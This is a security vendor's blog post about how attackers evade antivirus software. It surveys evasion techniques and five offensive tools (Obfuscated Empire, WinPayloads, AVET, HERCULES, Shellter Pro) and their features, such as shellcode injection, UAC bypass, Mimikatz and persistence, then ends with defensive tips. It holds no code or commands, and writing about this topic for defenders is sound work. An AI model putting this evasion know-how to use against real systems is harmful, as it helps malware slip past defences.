Antivirus software is one of the oldest and the most ever present security control against malware and various types of malicious software. It’s historically focused on blocking viruses, then eventually evolved into blocking all sort of other malware. “I have antivirus so I’m covered” used have some legitimate weight to it. Lately, however, attacks have been growing more sophisticated, specifically trying to stay under the radar using administrator toolkits and evading virus signatures to bypass these formerly effective standalone security control. At this point, antivirus technology have been outpaced by endpoint detection and prevention technology that is behavioral in nature and uses virtualized malware detonation technology.
You can trace back NopSec’s roots to penetration testing (ethical hacking), and to this day we’re always looking for tools and techniques to help our penetration testers and our security engineers to develop ways for our customers to mitigate these malicious attacks. This blog post will explore how hackers evade a standard security control: antivirus software, and will give you tips on what to do should you become a victim.
Exploitation and Privilege Escalation
Here’s the typical process used by attackers in exploitation and privilege escalation:
- Find an open port and running service
- Determine that the service has a vulnerability
- Determine whether that vulnerability has an exploit available
A quick word on the difference between Scriptkiddies and L33t Hackers:
<For Scriptkiddies>:
Use Metasploit to associate the exploit with an available payload (example: Reverse Meterpreter shell). Hope for the best that the target does not have an antivirus or an end point security tool!
<For L33t hackers>:
Create a payload that can bypass antivirus by obfuscation, encryption or signature evasion (create a brand new payload or shellcode)
Antivirus Evasion Techniques
Here are three substantial techniques for evading antivirus detection:
- Creating a new payload or shellcode that creates a new signature that is not present in the antivirus tools database. This is effective but it falls short on those new solutions that base their detection on heuristics and behavioral analysis.
- Obfuscating (it can be reversed) or encrypting the payload at runtime, so that it gets decrypted on the fly and injected into memory.
- Using payloads that use OSes embedded tools and frameworks, including Powershell in Windows and Python in Windows or Linux.
The following tools to be presented use one or a combination of the above-mentioned evasion techniques. Here are our top 5 tools!
Tool #1: Obfuscated Empire
- Integration of two projects: Invoke-Obfuscation and Powershell Empire
- Empire invokes a powershell implant, so even in its original version it does trip many alarms. The implant C2 channel runs completely in-memory and it does touch disk
- Invoke-Obfuscation performs various types of obfuscation on PowerShell scripts that fools these signatures.
- Launchers have added Obfuscate and ObfuscateCommand options. Simply set the Obfuscate flag to True, and you can optionally configure the Invoke-Obfuscation ObfuscateCommand to be used.
- By setting the global obfuscate flag to True, It obfuscates the entire agent-negotiation process as well as Empire’s PowerShell modules.
Do you want to see a live demo of Obfuscated Empire being used? If so, click here.
Tool #2: WinPayloads
- Undetectable Windows Payload Generation with extras Running on Python2.7
- UACBypass – PowerShellEmpire
- PowerUp – PowerShellEmpire
- Invoke-Shellcode
- Invoke-Mimikatz
- Invoke-EventVwrBypass
- Persistence
- Psexec Spray
- Upload to local webserver
- Powershell stager – allows invoking payloads in memory & more
Tool #3: AVET – Antivirus Evasion Tool
- When generating a payload with msfvenom the exe file is recognized and blocked by the antivirus
- AVET is a antivirus evasion tool targeting windows machines with executable files
- Assembly shellcodes can be used and shellcode can be generated with msfvenom or other means
- make_avet can be used for configuring the source code
- You can load ASCII encoded shellcodes from a textfile or from a web server; furthermore it is using an AV evasion technique to avoid sandboxing and emulation
- Automation script and a Python wizard for automating commands
Tool #4: HERCULES – Payload Generator
- HERCULES generate various meterpreter payloads and a custom HERCULES payload
- Each payload is packed with UPX
- It can add persistence and migration to a specific process
Tool #5: SHELLTER PRO
- Shellter is a dynamic shellcode injection tool
- It can be used in order to inject shellcode into native Windows
- Compatible with Windows x86/x64 (XP SP3 and above) & Wine/CrossOver for Linux/Mac.
- Supports any 32-bit payload (generated either by metasploit or custom ones by the user).
- Stealth Mode – Preserves Original Functionality.
- Multi-Payload PE infection.
- Proprietary Encoding + User Defined Encoding Sequence.
- Supports Reflective DLL loaders.
- Embedded MSF Payloads.
- Junk code Polymorphic engine.
- <PRO> Dynamic Payload Injection In DLLs
- <PRO> Multi-Payload Chaining
- <PRO> More MSF-compatible built-in payloads
How to Stay Secure if Antivirus is ByPassed
In the unfortunate event that your antivirus security control is bypassed? What do you do? Here are some tips from our security team:
- Deploy a multi-layered security control system
- Install endpoint security solutions: Anti-virus isn’t enough anymore
- Use strong egress traffic rules on your firewall to prevent egress shells
To watch the full on-demand webcast featuring NopSec CTO, Michelangelo Sidagni, go here.
To learn more about NopSec’s expert Penetration Testing and other cybersecurity services, please visit nopsec.com/services or call us at 646-502-7900.
References